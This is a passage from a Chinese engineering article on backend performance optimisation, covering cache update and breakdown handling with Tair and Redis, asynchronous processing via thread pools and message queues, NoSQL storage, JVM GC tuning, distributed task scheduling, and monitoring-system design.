其他情况，可以考虑缓存服务。目前从资源的投入度、可运维性、是否能动态扩容以及配套设施来考虑，我们优先考虑Tair。除非目前Tair还不能支持的场合（比如分布式锁、Hash类型的value），我们考虑用Redis。
设计关键点
什么时候更新缓存？如何保障更新的可靠性和实时性？
更新缓存的策略，需要具体问题具体分析。这里以门店POI的缓存数据为例，来说明一下缓存服务型的缓存更新策略是怎样的？目前约10万个POI数据采用了Tair作为缓存服务，具体更新的策略有两个：

接收门店变更的消息，准实时更新。
给每一个POI缓存数据设置5分钟的过期时间，过期后从DB加载再回设到DB。这个策略是对第一个策略的有力补充，解决了手动变更DB不发消息、接消息更新程序临时出错等问题导致的第一个策略失效的问题。通过这种双保险机制，有效地保证了POI缓存数据的可靠性和实时性。
缓存是否会满，缓存满了怎么办？
对于一个缓存服务，理论上来说，随着缓存数据的日益增多，在容量有限的情况下，缓存肯定有一天会满的。如何应对？
① 给缓存服务，选择合适的缓存逐出算法，比如最常见的LRU。
② 针对当前设置的容量，设置适当的警戒值，比如10G的缓存，当缓存数据达到8G的时候，就开始发出报警，提前排查问题或者扩容。
③ 给一些没有必要长期保存的key，尽量设置过期时间。

缓存是否允许丢失？丢失了怎么办？
根据业务场景判断，是否允许丢失。如果不允许，就需要带持久化功能的缓存服务来支持，比如Redis或者Tair。更细节的话，可以根据业务对丢失时间的容忍度，还可以选择更具体的持久化策略，比如Redis的RDB或者AOF。

缓存被“击穿”问题
对于一些设置了过期时间的key，如果这些key可能会在某些时间点被超高并发地访问，是一种非常“热点”的数据。这个时候，需要考虑另外一个问题：缓存被“击穿”的问题。

概念：缓存在某个时间点过期的时候，恰好在这个时间点对这个Key有大量的并发请求过来，这些请求发现缓存过期一般都会从后端DB加载数据并回设到缓存，这个时候大并发的请求可能会瞬间把后端DB压垮。
如何解决：业界比较常用的做法，是使用mutex。简单地来说，就是在缓存失效的时候（判断拿出来的值为空），不是立即去load db，而是先使用缓存工具的某些带成功操作返回值的操作（比如Redis的SETNX或者Memcache的ADD）去set一个mutex key，当操作返回成功时，再进行load db的操作并回设缓存；否则，就重试整个get缓存的方法。类似下面的代码：

public String get(key) {
    String value = redis.get(key);
    if (value == null) { //代表缓存值过期
        //设置3min的超时，防止del操作失败的时候，下次缓存过期一直不能load db
        if (redis.setnx(key_mutex, 1, 3 * 60) == 1) {  //代表设置成功
             value = db.get(key);
                    redis.set(key, value, expire_secs);
                    redis.del(key_mutex);
            } else {  //这个时候代表同时候的其他线程已经load db并回设到缓存了，这时候重试获取缓存值即可
                    sleep(50);
                    get(key);  //重试
            }
        } else {
            return value;      
        }
}

异步

使用场景
针对某些客户端的请求，在服务端可能需要针对这些请求做一些附属的事情，这些事情其实用户并不关心或者用户不需要立即拿到这些事情的处理结果，这种情况就比较适合用异步的方式处理这些事情。

作用
缩短接口响应时间，使用户的请求快速返回，用户体验更好。
避免线程长时间处于运行状态，这样会引起服务线程池的可用线程长时间不够用，进而引起线程池任务队列长度增大，从而阻塞更多请求任务，使得更多请求得不到技术处理。
线程长时间处于运行状态，可能还会引起系统Load、CPU使用率、机器整体性能下降等一系列问题，甚至引发雪崩。异步的思路可以在不增加机器数和CPU数的情况下，有效解决这个问题。
常见做法
一种做法，是额外开辟线程，这里可以采用额外开辟一个线程或者使用线程池的做法，在IO线程（处理请求响应）之外的线程来处理相应的任务，在IO线程中让response先返回。

如果异步线程处理的任务设计的数据量非常巨大，那么可以引入阻塞队列BlockingQueue作进一步的优化。具体做法是让一批异步线程不断地往阻塞队列里扔数据，然后额外起一个处理线程，循环批量从队列里拿预设大小的一批数据，来进行批处理（比如发一个批量的远程服务请求），这样进一步提高了性能。

另一种做法，是使用消息队列（MQ）中间件服务，MQ天生就是异步的。一些额外的任务，可能不需要我这个系统来处理，但是需要其他系统来处理。这个时候可以先把它封装成一个消息，扔到消息队列里面，通过消息中间件的可靠性保证把消息投递到关心它的系统，然后让这个系统来做相应的处理。

比如C端在完成一个提单动作以后，可能需要其它端做一系列的事情，但是这些事情的结果不会立刻对C端用户产生影响，那么就可以先把C端下单的请求响应先返回给用户，返回之前往MQ中发一个消息即可。而且这些事情理应不是C端的负责范围，所以这个时候用MQ的方式，来解决这个问题最合适。

NoSQL

和缓存的区别
先说明一下，这里介绍的和缓存那一节不一样，虽然可能会使用一样的数据存储方案（比如Redis或者Tair），但是使用的方式不一样，这一节介绍的是把它作为DB来用。如果当作DB来用，需要有效保证数据存储方案的可用性、可靠性。

使用场景
需要结合具体的业务场景，看这块业务涉及的数据是否适合用NoSQL来存储，对数据的操作方式是否适合用NoSQL的方式来操作，或者是否需要用到NoSQL的一些额外特性（比如原子加减等）。

如果业务数据不需要和其他数据作关联，不需要事务或者外键之类的支持，而且有可能写入会异常频繁，这个时候就比较适合用NoSQL（比如HBase）。

比如，美团点评内部有一个对exception做的监控系统，如果在应用系统发生严重故障的时候，可能会短时间产生大量exception数据，这个时候如果选用MySQL，会造成MySQL的瞬间写压力飙升，容易导致MySQL服务器的性能急剧恶化以及主从同步延迟之类的问题，这种场景就比较适合用Hbase类似的NoSQL来存储。

JVM调优

什么时候调？
通过监控系统（如没有现成的系统，自己做一个简单的上报监控的系统也很容易）上对一些机器关键指标（gc time、gc count、各个分代的内存大小变化、机器的Load值与CPU使用率、JVM的线程数等）的监控报警，也可以看gc log和jstat等命令的输出，再结合线上JVM进程服务的一些关键接口的性能数据和请求体验，基本上就能定位出当前的JVM是否有问题，以及是否需要调优。

怎么调？
如果发现高峰期CPU使用率与Load值偏大，这个时候可以观察一些JVM的thread count以及gc count（可能主要是young gc count），如果这两个值都比以往偏大（也可以和一个历史经验值作对比），基本上可以定位是young gc频率过高导致，这个时候可以通过适当增大young区大小或者占比的方式来解决。
如果发现关键接口响应时间很慢，可以结合gc time以及gc log中的stop the world的时间，看一下整个应用的stop the world的时间是不是比较多。如果是，可能需要减少总的gc time，具体可以从减小gc的次数和减小单次gc的时间这两个维度来考虑，一般来说，这两个因素是一对互斥因素，我们需要根据实际的监控数据来调整相应的参数（比如新生代与老生代比值、eden与survivor比值、MTT值、触发cms回收的old区比率阈值等）来达到一个最优值。
如果发生full gc或者old cms gc非常频繁，通常这种情况会诱发STW的时间相应加长，从而也会导致接口响应时间变慢。这种情况，大概率是出现了“内存泄露”，Java里的内存泄露指的是一些应该释放的对象没有被释放掉（还有引用拉着它）。那么这些对象是如何产生的呢？为啥不会释放呢？对应的代码是不是出问题了？问题的关键是搞明白这个，找到相应的代码，然后对症下药。所以问题的关键是转化成寻找这些对象。怎么找？综合使用jmap和MAT，基本就能定位到具体的代码。
多线程与分布式
使用场景
离线任务、异步任务、大数据任务、耗时较长任务的运行**，适当地利用，可达到加速的效果。

注意：线上对响应时间要求较高的场合，尽量少用多线程，尤其是服务线程需要等待任务线程的场合（很多重大事故就是和这个息息相关），如果一定要用，可以对服务线程设置一个最大等待时间。

常见做法
如果单机的处理能力可以满足实际业务的需求，那么尽可能地使用单机多线程的处理方式，减少复杂性；反之，则需要使用多机多线程的方式。

对于单机多线程，可以引入线程池的机制，作用有二：

提高性能，节省线程创建和销毁的开销
限流，给线程池一个固定的容量，达到这个容量值后再有任务进来，就进入队列进行排队，保障机器极限压力下的稳定处理能力在使用JDK自带的线程池时，一定要仔细理解构造方法的各个参数的含义，如core pool size、max pool size、keepAliveTime、worker queue等，在理解的基础上通过不断地测试调整这些参数值达到最优效果。
如果单机的处理能力不能满足需求，这个时候需要使用多机多线程的方式。这个时候就需要一些分布式系统的知识了。首先就必须引入一个单独的节点，作为调度器，其他的机器节点都作为执行器节点。调度器来负责拆分任务，和分发任务到合适的执行器节点；执行器节点按照多线程的方式（也可能是单线程）来执行任务。这个时候，我们整个任务系统就由单击演变成一个集群的系统，而且不同的机器节点有不同的角色，各司其职，各个节点之间还有交互。这个时候除了有多线程、线程池等机制，像RPC、心跳等网络通信调用的机制也不可少。后续我会出一个简单的分布式调度运行的框架。

度量系统（监控、报警、服务依赖管理）
严格来说，度量系统不属于性能优化的范畴，但是这方面和性能优化息息相关，可以说为性能优化提供一个强有力的数据参考和支撑。没有度量系统，基本上就没有办法定位到系统的问题，也没有办法有效衡量优化后的效果。很多人不重视这方面，但我认为它是系统稳定性和性能保障的基石。

关键流程
如果要设计这套系统，总体来说有哪些关键流程需要设计呢？
① 确定指标
② 采集数据
③ 计算数据，存储结果
④ 展现和分析

需要监控和报警哪些指标数据？需要关注哪些？
按照需求出发，主要需要二方面的指标：

接口性能相关，包括单个接口和全部的QPS、响应时间、调用量（统计时间维度越细越好；最好是，既能以节点为维度，也可以以服务集群为维度，来查看相关数据）。其中还涉及到服务依赖关系的管理，这个时候需要用到服务依赖管理系统
单个机器节点相关，包括CPU使用率、Load值、内存占用率、网卡流量等。如果节点是一些特殊类型的服务（比如MySQL、Redis、Tair），还可以监控这些服务特有的一些关键指标。
数据采集方式
通常采用异步上报的方式，具体做法有两种：第一种，发到本地的Flume端口，由Flume进程收集到远程的Hadoop集群或者Storm集群来进行运算；第二种，直接在本地运算好以后，使用异步和本地队列的方式，发送到监控服务器。

数据计算
可以采用离线运算（MapReduce/Hive）或者实时/准实时运算（Storm/Spark）的方式，运算后的结果存入MySQL或者HBase；某些情况，也可以不计算，直接采集发往监控服务器。

展现和分析
提供统一的展现分析平台，需要带报表（列表/图表）监控和报警的功能。